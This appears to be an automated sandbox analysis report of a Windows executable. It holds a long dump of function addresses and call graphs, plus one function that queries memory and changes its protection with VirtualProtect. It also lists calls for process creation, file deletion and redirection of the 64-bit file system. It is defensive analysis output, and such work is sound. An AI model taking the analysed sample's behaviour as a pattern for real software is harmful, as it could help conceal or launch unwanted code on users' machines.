6433->6435 6434->6431 6434->6433 6435->6426 6437 408ccc 4 API calls 6436->6437 6438 408d18 6437->6438 6438->6373 6440 4057b9 6439->6440 6441 405890 5 API calls 6440->6441 6442 4057cb 6441->6442 6442->6442 6443->6368 6659 406780 6444->6659 6447 403454 4 API calls 6448 4068aa 6447->6448 6449 406620 6448->6449 6664 406844 6449->6664 6452 406650 6454 403340 4 API calls 6452->6454 6453 40665e 6455 403454 4 API calls 6453->6455 6456 40665c 6454->6456 6457 406671 6455->6457 6459 403198 4 API calls 6456->6459 6458 403340 4 API calls 6457->6458 6458->6456 6460 406693 6459->6460 6461 406598 6460->6461 6462 4065a2 6461->6462 6463 4065c5 6461->6463 6670 4068b0 6462->6670 6464 40322c 4 API calls 6463->6464 6466 4065ce 6464->6466 6466->6384 6467 4065a9 6467->6463 6468 4065b4 6467->6468 6469 403340 4 API calls 6468->6469 6470 4065c2 6469->6470 6470->6384 6472 403344 6471->6472 6473 4033a5 6471->6473 6474 4031e8 6472->6474 6475 40334c 6472->6475 6477 4031fc 6474->6477 6480 403254 4 API calls 6474->6480 6475->6473 6476 40335b 6475->6476 6479 4031e8 4 API calls 6475->6479 6481 403254 4 API calls 6476->6481 6478 403228 6477->6478 6482 4025ac 4 API calls 6477->6482 6478->6386 6479->6476 6480->6477 6483 403375 6481->6483 6482->6478 6484 4031e8 4 API calls 6483->6484 6485 4033a1 6484->6485 6485->6386 6528 4069b8 6486->6528 6489 406c86 6491 4069b8 5 API calls 6489->6491 6493 406cd2 6489->6493 6492 406c96 6491->6492 6494 406ca2 6492->6494 6496 406994 7 API calls 6492->6496 6536 4067e8 6493->6536 6494->6493 6497 406cc7 6494->6497 6500 4069b8 5 API calls 6494->6500 6496->6494 6497->6493 6548 406c28 GetWindowsDirectoryA 6497->6548 6502 406cbb 6500->6502 6501 406598 5 API calls 6503 406ce7 6501->6503 6502->6497 6504 406994 7 API calls 6502->6504 6505 40322c 4 API calls 6503->6505 6504->6497 6506 406cf1 6505->6506 6507 4031b8 4 API calls 6506->6507 6508 406d0b 6507->6508 6508->6406 6510 409168 6509->6510 6511 406598 5 API calls 6510->6511 6512 409181 6511->6512 6513 40322c 4 API calls 6512->6513 6516 40918c 6513->6516 6514 4068d8 6 API calls 6514->6516 6516->6514 6517 408cfc 4 API calls 6516->6517 6518 4033b4 4 API calls 6516->6518 6519 4057e0 4 API calls 6516->6519 6521 409208 6516->6521 6588 4090d4 6516->6588 6596 408f58 6516->6596 6517->6516 6518->6516 6519->6516 6522 40322c 4 API calls 6521->6522 6523 409213 6522->6523 6524 4031b8 4 API calls 6523->6524 6525 40922d 6524->6525 6526 403198 4 API calls 6525->6526 6527 409235 6526->6527 6527->6406 6529 4034f0 4 API calls 6528->6529 6530 4069cb 6529->6530 6531 4069e2 GetEnvironmentVariableA 6530->6531 6535 4069f5 6530->6535 6550 406d4c 6530->6550 6531->6530 6532 4069ee 6531->6532 6534 403198 4 API calls 6532->6534 6534->6535 6535->6489 6545 406994 6535->6545 6537 403414 6536->6537 6538 40680b GetFullPathNameA 6537->6538 6539 406817 6538->6539 6540 40682e 6538->6540 6539->6540 6541 40681f 6539->6541 6542 40322c 4 API calls 6540->6542 6543 403278 4 API calls 6541->6543 6544 40682c 6542->6544 6543->6544 6544->6501 6554 40693c 6545->6554 6549 406c49 6548->6549 6549->6493 6551 406d5a 6550->6551 6552 4034f0 4 API calls 6551->6552 6553 406d68 6552->6553 6553->6530 6561 4068d8 6554->6561 6556 40695e 6557 406966 GetFileAttributesA 6556->6557 6558 40697b 6557->6558 6559 403198 4 API calls 6558->6559 6560 406983 6559->6560 6560->6489 6571 4066a4 6561->6571 6563 4068e9 6565 406910 6563->6565 6578 4068d0 CharPrevA 6563->6578 6566 406926 6565->6566 6567 40691b 6565->6567 6579 403454 6566->6579 6568 40322c 4 API calls 6567->6568 6570 406924 6568->6570 6570->6556 6574 4066b5 6571->6574 6572 406719 6573 4065e0 IsDBCSLeadByte 6572->6573 6575 406714 6572->6575 6573->6575 6574->6572 6577 4066d3 6574->6577 6575->6563 6577->6575 6586 4065e0 IsDBCSLeadByte 6577->6586 6578->6563 6580 403486 6579->6580 6581 403459 6579->6581 6582 403198 4 API calls 6580->6582 6581->6580 6584 40346d 6581->6584 6583 40347c 6582->6583 6583->6570 6585 403278 4 API calls 6584->6585 6585->6583 6587 4065f4 6586->6587 6587->6577 6589 403198 4 API calls 6588->6589 6591 4090f5 6589->6591 6593 409122 6591->6593 6605 4032a8 6591->6605 6608 403494 6591->6608 6594 403198 4 API calls 6593->6594 6595 409137 6594->6595 6595->6516 6597 408e94 2 API calls 6596->6597 6598 408f6e 6597->6598 6599 408f72 6598->6599 6612 4069a8 6598->6612 6599->6516 6602 408fa5 6603 408ed0 Wow64RevertWow64FsRedirection 6602->6603 6604 408fad 6603->6604 6604->6516 6606 403278 4 API calls 6605->6606 6607 4032b5 6606->6607 6607->6591 6609 403498 6608->6609 6611 4034c3 6608->6611 6610 4034f0 4 API calls 6609->6610 6610->6611 6611->6591 6613 40693c 7 API calls 6612->6613 6614 4069b2 GetLastError 6613->6614 6614->6602 6616 406fc7 6615->6616 6634 406fbe 6615->6634 6617 406fd0 6616->6617 6618 407008 6616->6618 6636 406ec8 6617->6636 6619 406ec8 RegOpenKeyExA 6618->6619 6622 407021 6619->6622 6621 406fe9 6623 40703e 6621->6623 6639 406ebc 6621->6639 6622->6623 6625 406ebc 6 API calls 6622->6625 6626 40322c 4 API calls 6623->6626 6629 407035 RegCloseKey 6625->6629 6630 40704b 6626->6630 6627 403198 4 API calls 6631 407080 6627->6631 6629->6623 6632 4032fc 4 API calls 6630->6632 6633 403198 4 API calls 6631->6633 6632->6634 6635 407088 6633->6635 6634->6627 6635->6428 6637 406ed3 6636->6637 6638 406ed9 RegOpenKeyExA 6636->6638 6637->6638 6638->6621 6642 406d70 6639->6642 6643 406d96 RegQueryValueExA 6642->6643 6648 406db9 6643->6648 6657 406ddb 6643->6657 6644 406dd3 6646 403198 4 API calls 6644->6646 6645 403198 4 API calls 6647 406ea7 RegCloseKey 6645->6647 6646->6657 6647->6623 6648->6644 6649 403278 4 API calls 6648->6649 6650 403420 4 API calls 6648->6650 6648->6657 6649->6648 6651 406e10 RegQueryValueExA 6650->6651 6651->6643 6652 406e2c 6651->6652 6653 4034f0 4 API calls 6652->6653 6652->6657 6654 406e6e 6653->6654 6655 406e80 6654->6655 6658 403420 4 API calls 6654->6658 6656 4031e8 4 API calls 6655->6656 6656->6657 6657->6645 6658->6655 6660 4066a4 IsDBCSLeadByte 6659->6660 6662 406795 6660->6662 6661 4067df 6661->6447 6662->6661 6663 4065e0 IsDBCSLeadByte 6662->6663 6663->6662 6665 406853 6664->6665 6666 406780 IsDBCSLeadByte 6665->6666 6669 40685e 6666->6669 6667 40664a 6667->6452 6667->6453 6668 4065e0 IsDBCSLeadByte 6668->6669 6669->6667 6669->6668 6671 4068b7 6670->6671 6672 4068bb 6670->6672 6671->6467 6675 4068d0 CharPrevA 6672->6675 6674 4068cc 6674->6467 6675->6674 5678 407628 WriteFile 5679 407648 5678->5679 5682 40764f 5678->5682 5680 4073ec 21 API calls 5679->5680 5680->5682 5681 407660 5682->5681 5683 40734c 20 API calls 5682->5683 5683->5681 5979 403a28 ReadFile 5980 403a46 5979->5980 5981 403a49 GetLastError 5979->5981 6680 403932 6681 403924 6680->6681 6682 40374c VariantClear 6681->6682 6683 40392c 6682->6683 6684 408b34 6685 408b3b 6684->6685 6686 403198 4 API calls 6685->6686 6692 408bd5 6686->6692 6687 408c00 6688 4031b8 4 API calls 6687->6688 6690 408c8d 6688->6690 6689 408bec 6693 4032fc 4 API calls 6689->6693 6691 403278 4 API calls 6691->6692 6692->6687 6692->6689 6692->6691 6694 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6692->6694 6693->6687 6694->6692 5988 407ec0 5989 407ee8 5988->5989 5991 407eef 5988->5991 5990 407dfc 21 API calls 5989->5990 5990->5991 5992 407f16 5991->5992 5993 407f18 5991->5993 5997 407f22 5991->5997 5998 4050e4 19 API calls 5992->5998 5994 407d14 19 API calls 5993->5994 5994->5997 5995 407d14 19 API calls 5996 407f57 5995->5996 5999 403198 4 API calls 5996->5999 5997->5995 5997->5996 6000 407f3e 5998->6000 6001 407f6c 5999->6001 6003 407c9c 6000->6003 6004 407c9f 6003->6004 6005 40322c 4 API calls 6004->6005 6006 407cc1 6005->6006 6007 4032fc 4 API calls 6006->6007 6008 407ccb 6007->6008 6009 4057e0 4 API calls 6008->6009 6010 407cda 6009->6010 6011 403198 4 API calls 6010->6011 6012 407cf4 6011->6012 6012->5997 5868 4075cc SetFilePointer 5869 407603 5868->5869 5870 4075f3 GetLastError 5868->5870 5870->5869 5871 4075fc 5870->5871 5872 4073ec 21 API calls 5871->5872 5872->5869 6017 402ccc 6020 402cfe 6017->6020 6021 402cdd 6017->6021 6018 402d88 RtlUnwind 6019 403154 4 API calls 6018->6019 6019->6020 6021->6018 6021->6020 6022 402b28 RaiseException 6021->6022 6023 402d7f 6022->6023 6023->6018 6703 403fcd 6704 403f07 4 API calls 6703->6704 6705 403fd6 6704->6705 6706 403e9c 4 API calls 6705->6706 6707 403fe2 6706->6707 4914 4024d0 4915 4024e4 4914->4915 4916 4024f7 4914->4916 4953 401918 RtlInitializeCriticalSection 4915->4953 4917 402518 4916->4917 4918 40250e RtlEnterCriticalSection 4916->4918 4930 402300 4917->4930 4918->4917 4922 4024ed 4924 402525 4926 402581 4924->4926 4927 402577 RtlLeaveCriticalSection 4924->4927 4927->4926 4928 402531 4928->4924 4960 40215c 4928->4960 4931 402314 4930->4931 4933 4023b8 4931->4933 4934 402335 4931->4934 4932 402344 4932->4924 4940 401fd4 4932->4940 4933->4932 4938 402455 4933->4938 4977 401d80 4933->4977 4985 401e84 4933->4985 4934->4932 4974 401b74 4934->4974 4938->4932 4981 401d00 4938->4981 4941 401fe8 4940->4941 4942 401ffb 4940->4942 4944 401918 4 API calls 4941->4944 4943 402012 RtlEnterCriticalSection 4942->4943 4947 40201c 4942->4947 4943->4947 4945 401fed 4944->4945 4945->4942 4946 401ff1 4945->4946 4952 402052 4946->4952 4947->4952 5067 401ee0 4947->5067 4950 402147 4950->4928 4951 40213d RtlLeaveCriticalSection 4951->4950 4952->4928 4954 40193c RtlEnterCriticalSection 4953->4954 4955 401946 4953->4955 4954->4955 4956 401964 LocalAlloc 4955->4956 4957 40197e 4956->4957 4958 4019c3 RtlLeaveCriticalSection 4957->4958 4959 4019cd 4957->4959 4958->4959 4959->4916 4959->4922 4961 40217a 4960->4961 4962 402175 4960->4962 4964 4021b5 4961->4964 4965 4021ab RtlEnterCriticalSection 4961->4965 4966 40217e 4961->4966 4963 401918 4 API calls 4962->4963 4963->4961 4967 402244 4964->4967 4970 4021c1 4964->4970 4972 402270 4964->4972 4965->4964 4966->4924 4967->4966 4971 401d80 7 API calls 4967->4971 4968 4022e3 RtlLeaveCriticalSection 4969 4022ed 4968->4969 4969->4924 4970->4968 4970->4969 4971->4966 4972->4970 4973 401d00 7 API calls 4972->4973 4973->4970 4975 40215c 9 API calls 4974->4975 4976 401b95 4975->4976 4976->4932 4978 401d89 4977->4978 4980 401d92 4977->4980 4979 401b74 9 API calls 4978->4979 4978->4980 4979->4980 4980->4933 4982 401d4e 4981->4982 4983 401d1e 4981->4983 4982->4983 4990 401c68 4982->4990 4983->4932 5045 401768 4985->5045 4987 401e99 4989 401ea6 4987->4989 5056 401dcc 4987->5056 4989->4933 4991 401c7a 4990->4991 4992 401c9d 4991->4992 4993 401caf 4991->4993 5003 40188c 4992->5003 4995 40188c 3 API calls 4993->4995 4996 401cad 4995->4996 4997 401cc5 4996->4997 5013 401b44 4996->5013 4997->4983 4999 401cd4 5000 401cee 4999->5000 5018 401b98 4999->5018 5023 4013a0 5000->5023 5004 4018b2 5003->5004 5005 40190b 5003->5005 5027 401658 5004->5027 5005->4996 5010 4018e6 5010->5005 5012 4013a0 LocalAlloc 5010->5012 5012->5005 5014 401b61 5013->5014 5015 401b52 5013->5015 5014->4999 5016 401d00 9 API calls 5015->5016 5017 401b5f 5016->5017 5017->4999 5019 401bab 5018->5019 5020 401b9d 5018->5020 5019->5000 5021 401b74 9 API calls 5020->5021 5022 401baa 5021->5022 5022->5000 5024 4013ab 5023->5024 5025 4013c6 5024->5025 5026 4012e4 LocalAlloc 5024->5026 5025->4997 5026->5025 5029 40168f 5027->5029 5028 4016cf 5031 40132c 5028->5031 5029->5028 5030 4016a9 VirtualFree 5029->5030 5030->5029 5032 401348 5031->5032 5039 4012e4 5032->5039 5035 40150c 5036 40153b 5035->5036 5037 401594 5036->5037 5038 401568 VirtualFree 5036->5038 5037->5010 5038->5036 5042 40128c 5039->5042 5043 401298 LocalAlloc 5042->5043 5044 4012aa 5042->5044 5043->5044 5044->5010 5044->5035 5046 401787 5045->5046 5047 40183b 5046->5047 5048 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5046->5048 5049 40132c LocalAlloc 5046->5049 5051 401821 5046->5051 5053 4017d6 5046->5053 5054 4017e7 5047->5054 5063 4015c4 5047->5063 5048->5046 5049->5046 5052 40150c VirtualFree 5051->5052 5052->5054 5055 40150c VirtualFree 5053->5055 5054->4987 5055->5054 5057 401d80 9 API calls 5056->5057 5058 401de0 5057->5058 5059 40132c LocalAlloc 5058->5059 5061 401df0 5059->5061 5060 401df8 5060->4989 5061->5060 5062 401b44 9 API calls 5061->5062 5062->5060 5064 40160a 5063->5064 5065 401626 VirtualAlloc 5064->5065 5066 40163a 5064->5066 5065->5064 5065->5066 5066->5054 5070 401ef0 5067->5070 5068 401f1c 5069 401d00 9 API calls 5068->5069 5072 401f40 5068->5072 5069->5072 5070->5068 5070->5072 5073 401e58 5070->5073 5072->4950 5072->4951 5078 4016d8 5073->5078 5076 401e75 5076->5070 5077 401dcc 9 API calls 5077->5076 5082 4016f4 5078->5082 5079 4016fe 5081 4015c4 VirtualAlloc 5079->5081 5083 40170a 5081->5083 5082->5079 5084 40132c LocalAlloc 5082->5084 5085 40174f 5082->5085 5087 40175b 5082->5087 5088 401430 5082->5088 5083->5087 5084->5082 5086 40150c VirtualFree 5085->5086 5086->5087 5087->5076 5087->5077 5089 40143f VirtualAlloc 5088->5089 5091 40146c 5089->5091 5092 40148f 5089->5092 5093 4012e4 LocalAlloc 5091->5093 5092->5082 5094 401478 5093->5094 5094->5092 5095 40147c VirtualFree 5094->5095 5095->5092 6028 4028d2 6029 4028da 6028->6029 6030 403554 4 API calls 6029->6030 6031 4028ef 6029->6031 6030->6029 6032 4025ac 4 API calls 6031->6032 6033 4028f4 6032->6033 6708 4019d3 6709 4019ba 6708->6709 6710 4019c3 RtlLeaveCriticalSection 6709->6710 6711 4019cd 6709->6711 6710->6711 5687 409fd8 5718 409460 GetLastError 5687->5718 5690 402f24 5 API calls 5691 409fe4 5690->5691 5692 409fee CreateWindowExA SetWindowLongA 5691->5692 5693 4050e4 19 API calls 5692->5693 5694 40a071 5693->5694 5731 4032fc 5694->5731 5696 40a07f 5697 4032fc 4 API calls 5696->5697 5698 40a08c 5697->5698 5745 406adc GetCommandLineA 5698->5745 5701 4032fc 4 API calls 5702 40a0a1 5701->5702 5750 409888 5702->5750 5706 40a0c6 5707 40a0e6 5706->5707 5708 40a0ff 5706->5708 5772 4093fc 5707->5772 5710 40a118 5708->5710 5714 40a112 RemoveDirectoryA 5708->5714 5711 40a121 73A15CF0 5710->5711 5712 40a12c 5710->5712 5711->5712 5713 40a154 5712->5713 5780 40357c 5712->5780 5714->5710 5716 40a14a 5717 4025ac 4 API calls 5716->5717 5717->5713 5793 404be4 5718->5793 5721 4071e4 5 API calls 5722 4094b7 5721->5722 5796 408ccc 5722->5796 5725 4057e0 4 API calls 5726 4094db 5725->5726 5727 4031b8 4 API calls 5726->5727 5728 4094fa 5727->5728 5729 403198 4 API calls 5728->5729 5730 409502 5729->5730 5730->5690 5732 403300 5731->5732 5733 40333f 5731->5733 5734 4031e8 5732->5734 5735 40330a 5732->5735 5733->5696 5738 4031fc 5734->5738 5742 403254 4 API calls 5734->5742 5736 403334 5735->5736 5737 40331d 5735->5737 5741 4034f0 4 API calls 5736->5741 5739 4034f0 4 API calls 5737->5739 5740 403228 5738->5740 5743 4025ac 4 API calls 5738->5743 5744 403322 5739->5744 5740->5696 5741->5744 5742->5738 5743->5740 5744->5696 5746 406a50 4 API calls 5745->5746 5747 406b01 5746->5747 5748 403198 4 API calls 5747->5748 5749 406b1f 5748->5749 5749->5701 5751 4033b4 4 API calls 5750->5751 5752 4098c3 5751->5752 5753 4098f5 CreateProcessA 5752->5753 5754 409901 5753->5754 5755 409908 CloseHandle 5753->5755 5756 409460 21 API calls 5754->5756 5757 409911 5755->5757 5756->5755 5810 40985c 5757->5810 5760 40992d 5761 40985c 3 API calls 5760->5761 5762 409932 GetExitCodeProcess CloseHandle 5761->5762 5763 409952 5762->5763 5764 403198 4 API calls 5763->5764 5765 40995a 5764->5765 5765->5706 5766 40969c 5765->5766 5767 4096a4 5766->5767 5771 4096de 5766->5771 5768 403420 4 API calls 5767->5768 5767->5771 5769 4096d8 5768->5769 5814 408da4 5769->5814 5771->5706 5773 409456 5772->5773 5777 40940f 5772->5777 5773->5708 5774 409417 Sleep 5774->5777 5775 409427 Sleep 5775->5777 5777->5773 5777->5774 5777->5775 5778 40943e GetLastError 5777->5778 5830 408ee0 5777->5830 5778->5773 5779 409448 GetLastError 5778->5779 5779->5773 5779->5777 5781 403591 5780->5781 5782 4035a0 5780->5782 5783 4035b6 5781->5783 5787 4035d0 5781->5787 5788 40359b 5781->5788 5784 4035b1 5782->5784 5785 4035b8 5782->5785 5783->5716 5789 403198 4 API calls 5784->5789 5786 4031b8 4 API calls 5785->5786 5786->5783 5787->5783 5790 40357c 4 API calls 5787->5790 5788->5782 5792 4035ec 5788->5792 5789->5783 5790->5787 5792->5783 5847 403554 5792->5847 5794 4050f8 19 API calls 5793->5794 5795 404c02 5794->5795 5795->5721 5797 408cec 5796->5797 5800 408ba4 5797->5800 5801 403198 4 API calls 5800->5801 5809 408bd5 5800->5809 5801->5809 5802 408c00 5803 4031b8 4 API calls 5802->5803 5805 408c8d 5803->5805 5804 408bec 5807 4032fc 4 API calls 5804->5807 5805->5725 5806 403278 4 API calls 5806->5809 5807->5802 5808 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5808->5809 5809->5802 5809->5804 5809->5806 5809->5808 5811 409870 PeekMessageA 5810->5811 5812 409882 MsgWaitForMultipleObjects 5811->5812 5813 409864 TranslateMessage DispatchMessageA 5811->5813 5812->5757 5812->5760 5813->5811 5815 408db2 5814->5815 5817 408dca 5815->5817 5827 408d3c 5815->5827 5818 408d3c 4 API calls 5817->5818 5819 408dee 5817->5819 5818->5819 5820 407878 InterlockedExchange 5819->5820 5821 408e09 5820->5821 5822 408d3c 4 API calls 5821->5822 5824 408e1c 5821->5824 5822->5824 5823 408d3c 4 API calls 5823->5824 5824->5823 5825 403278 4 API calls 5824->5825 5826 408e4b 5824->5826 5825->5824 5826->5771 5828 4057e0 4 API calls 5827->5828 5829 408d4d 5828->5829 5829->5817 5838 408e94 5830->5838 5832 408ef6 5833 408efa 5832->5833 5834 408f16 DeleteFileA GetLastError 5832->5834 5833->5777 5835 408f34 5834->5835 5844 408ed0 5835->5844 5839 408ea2 5838->5839 5840 408e9e 5838->5840 5841 408ec4 SetLastError 5839->5841 5842 408eab Wow64DisableWow64FsRedirection 5839->5842 5840->5832 5843 408ebf 5841->5843 5842->5843 5843->5832 5845 408ed5 Wow64RevertWow64FsRedirection 5844->5845 5846 408edf 5844->5846 5845->5846 5846->5777 5848 403566 5847->5848 5850 403578 5848->5850 5851 403604 5848->5851 5850->5792 5852 40357c 5851->5852 5853 4035a0 5852->5853 5857 4035d0 5852->5857 5858 40359b 5852->5858 5860 4035b6 5852->5860 5854 4035b1 5853->5854 5855 4035b8 5853->5855 5859 403198 4 API calls 5854->5859 5856 4031b8 4 API calls 5855->5856 5856->5860 5857->5860 5862 40357c 4 API calls 5857->5862 5858->5853 5861 4035ec 5858->5861 5859->5860 5860->5848 5861->5860 5863 403554 4 API calls 5861->5863 5862->5857 5863->5861 6715 4065dc IsDBCSLeadByte 6716 4065f4 6715->6716 6727 402be9 RaiseException 6728 402c04 6727->6728 6038 409ef0 6039 409f15 6038->6039 6040 407878 InterlockedExchange 6039->6040 6041 409f3f 6040->6041 6042 409f4f 6041->6042 6043 409984 4 API calls 6041->6043 6048 40760c SetEndOfFile 6042->6048 6043->6042 6045 409f6b 6046 4025ac 4 API calls 6045->6046 6047 409fa2 6046->6047 6049 407623 6048->6049 6050 40761c 6048->6050 6049->6045 6051 4073ec 21 API calls 6050->6051 6051->6049 6052 402af2 6053 402afe 6052->6053 6056 402ed0 6053->6056 6057 403154 4 API calls 6056->6057 6059 402ee0 6057->6059 6058 402b03 6059->6058 6061 402b0c 6059->6061 6062 402b25 6061->6062 6063 402b15 RaiseException 6061->6063 6062->6058 6063->6062 6064 405af2 6066 405af4 6064->6066 6065 405b30 6068 405890 5 API calls 6065->6068 6066->6065 6067 405b2a 6066->6067 6069 405b47 6066->6069 6067->6065 6070 405b9c 6067->6070 6071 405b43 6068->6071 6073 404c2c 5 API calls 6069->6073 6072 405900 19 API calls 6070->6072 6074 403198 4 API calls 6071->6074 6072->6071 6075 405b70 6073->6075 6076 405bd6 6074->6076 6077 405900 19 API calls 6075->6077 6077->6071 6729 402dfa 6730 402e26 6729->6730 6731 402e0d 6729->6731 6733 402ba4 6731->6733 6734 402bc9 6733->6734 6735 402bad 6733->6735 6734->6730 6736 402bb5 RaiseException 6735->6736 6736->6734 6737 4097fc 6738 40980b 6737->6738 6740 409815 6737->6740 6739 40983a CallWindowProcA 6738->6739 6738->6740 6739->6740 6100 403a80 CloseHandle 6101 403a90 6100->6101 6102 403a91 GetLastError 6100->6102 6103 404283 6104 4042c3 6103->6104 6105 403154 4 API calls 6104->6105 6106 404323 6105->6106 6745 404185 6746 4041ff 6745->6746 6747 4041cc 6746->6747 6748 403154 4 API calls 6746->6748 6749 404323 6748->6749 6107 403e87 6108 403e4c 6107->6108 6109 403e62 6108->6109 6110 403e7b 6108->6110 6112 403e67 6108->6112 6116 403cc8 6109->6116 6113 402674 4 API calls 6110->6113 6114 403e78 6112->6114 6120 402674 6112->6120 6113->6114 6117 403cd6 6116->6117 6118 403ceb 6117->6118 6119 402674 4 API calls 6117->6119 6118->6112 6119->6118 6121 403154 4 API calls 6120->6121 6122 40267a 6121->6122 6122->6114 5873 40758c ReadFile 5874 4075c3 5873->5874 5875 4075ac 5873->5875 5876 4075b2 GetLastError 5875->5876 5877 4075bc 5875->5877 5876->5874 5876->5877 5878 4073ec 21 API calls 5877->5878 5878->5874 6123 40708e 6124 407078 6123->6124 6125 403198 4 API calls 6124->6125 6126 407080 6125->6126 6127 403198 4 API calls 6126->6127 6128 407088 6127->6128 6133 403e95 6134 403e4c 6133->6134 6135 403e67 6134->6135 6136 403e62 6134->6136 6137 403e7b 6134->6137 6140 403e78 6135->6140 6141 402674 4 API calls 6135->6141 6138 403cc8 4 API calls 6136->6138 6139 402674 4 API calls 6137->6139 6138->6135 6139->6140 6141->6140 6142 403a97 6143 403aac 6142->6143 6144 403bbc GetStdHandle 6143->6144 6145 403b0e CreateFileA 6143->6145 6155 403ab2 6143->6155 6146 403c17 GetLastError 6144->6146 6150 403bba 6144->6150 6145->6146 6147 403b2c 6145->6147 6146->6155 6149 403b3b GetFileSize 6147->6149 6147->6150 6149->6146 6151 403b4e SetFilePointer 6149->6151 6152 403be7 GetFileType 6150->6152 6150->6155 6151->6146 6156 403b6a ReadFile 6151->6156 6154 403c02 CloseHandle 6152->6154 6152->6155 6154->6155 6156->6146 6157 403b8c 6156->6157 6157->6150 6158 403b9f SetFilePointer 6157->6158 6158->6146 6159 403bb0 SetEndOfFile 6158->6159 6159->6146 6159->6150 5684 4074a8 5685 4074b4 CloseHandle 5684->5685 5686 4074bd 5684->5686 5685->5686 6762 40a1a9 6771 409514 6762->6771 6765 402f24 5 API calls 6766 40a1b3 6765->6766 6767 403198 4 API calls 6766->6767 6768 40a1d2 6767->6768 6769 403198 4 API calls 6768->6769 6770 40a1da 6769->6770 6780 4055fc 6771->6780 6773 40952f 6774 40955d 6773->6774 6786 40716c 6773->6786 6777 403198 4 API calls 6774->6777 6776 40954d 6779 409555 MessageBoxA 6776->6779 6778 409572 6777->6778 6778->6765 6778->6766 6779->6774 6781 403154 4 API calls 6780->6781 6782 405601 6781->6782 6783 405619 6782->6783 6784 403154 4 API calls 6782->6784 6783->6773 6785 40560f 6784->6785 6785->6773 6787 4055fc 4 API calls 6786->6787 6788 40717b 6787->6788 6789 407181 6788->6789 6790 40718f 6788->6790 6791 40322c 4 API calls 6789->6791 6793 4071ab 6790->6793 6794 40719f 6790->6794 6792 40718d 6791->6792 6792->6776 6804 4032b8 6793->6804 6797 407130 6794->6797 6798 40322c 4 API calls 6797->6798 6799 40713f 6798->6799 6800 40715c 6799->6800 6801 4068b0 CharPrevA 6799->6801 6800->6792 6802 40714b 6801->6802 6802->6800 6803 4032fc 4 API calls 6802->6803 6803->6800 6805 403278 4 API calls 6804->6805 6806 4032c2 6805->6806 6806->6792 6807 4011aa 6808 4011ac GetStdHandle 6807->6808 6167 4028ac 6168 402594 4 API calls 6167->6168 6169 4028b6 6168->6169 6174 4050b0 6175 4050c3 6174->6175 6176 404da8 19 API calls 6175->6176 6177 4050d7 6176->6177 6817 409fb4 6818 409fe4 6817->6818 6819 409fee CreateWindowExA SetWindowLongA 6818->6819 6820 4050e4 19 API calls 6819->6820 6821 40a071 6820->6821 6822 4032fc 4 API calls 6821->6822 6823 40a07f 6822->6823 6824 4032fc 4 API calls 6823->6824 6825 40a08c 6824->6825 6826 406adc 5 API calls 6825->6826 6827 40a098 6826->6827 6828 4032fc 4 API calls 6827->6828 6829 40a0a1 6828->6829 6830 409888 29 API calls 6829->6830 6831 40a0b3 6830->6831 6832 40969c 5 API calls 6831->6832 6833 40a0c6 6831->6833 6832->6833 6834 40a0ff 6833->6834 6835 4093fc 9 API calls 6833->6835 6836 40a118 6834->6836 6840 40a112 RemoveDirectoryA 6834->6840 6835->6834 6837 40a121 73A15CF0 6836->6837 6838 40a12c 6836->6838 6837->6838 6839 40a154 6838->6839 6841 40357c 4 API calls 6838->6841 6840->6836 6842 40a14a 6841->6842 6843 4025ac 4 API calls 6842->6843 6843->6839 6178 401ab9 6179 401a96 6178->6179 6180 401aa9 RtlDeleteCriticalSection 6179->6180 6181 401a9f RtlLeaveCriticalSection 6179->6181 6181->6180

                                                                            Executed Functions

                                                                            Function 00409A14 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 108 409a14-409a38 GetSystemInfo VirtualQuery 109 409ac8-409acf 108->109 110 409a3e 108->110 111 409abd-409ac2 110->111 111->109 112 409a40-409a47 111->112 113 409aa9-409abb VirtualQuery 112->113 114 409a49-409a4d 112->114 113->109 113->111 114->113 115 409a4f-409a57 114->115 116 409a68-409a79 VirtualProtect 115->116 117 409a59-409a5c 115->117 119 409a7b 116->119 120 409a7d-409a7f 116->120 117->116 118 409a5e-409a61 117->118 118->116 121 409a63-409a66 118->121 119->120 122 409a8e-409a91 120->122 121->116 121->120 123 409a81-409a8a call 409a0c 122->123 124 409a93-409a95 122->124 123->122 124->113 126 409a97-409aa4 VirtualProtect 124->126 126->113
                                                                            APIs
                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409A26
                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31
                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                            • String ID:
                                                                            • API String ID: 2441996862-0
                                                                            • Opcode ID: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                            • Instruction ID: 05782b2e5a8588c9c74d05110837466633af9a4b7a19298b20ab433fd050a55e
                                                                            • Opcode Fuzzy Hash: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
                                                                            • Instruction Fuzzy Hash: D0216FB13003846BD6309A698C85E67B7DC9F85360F18492AFA85E62C3D73DED40CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040515C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                            Memory Dump Source
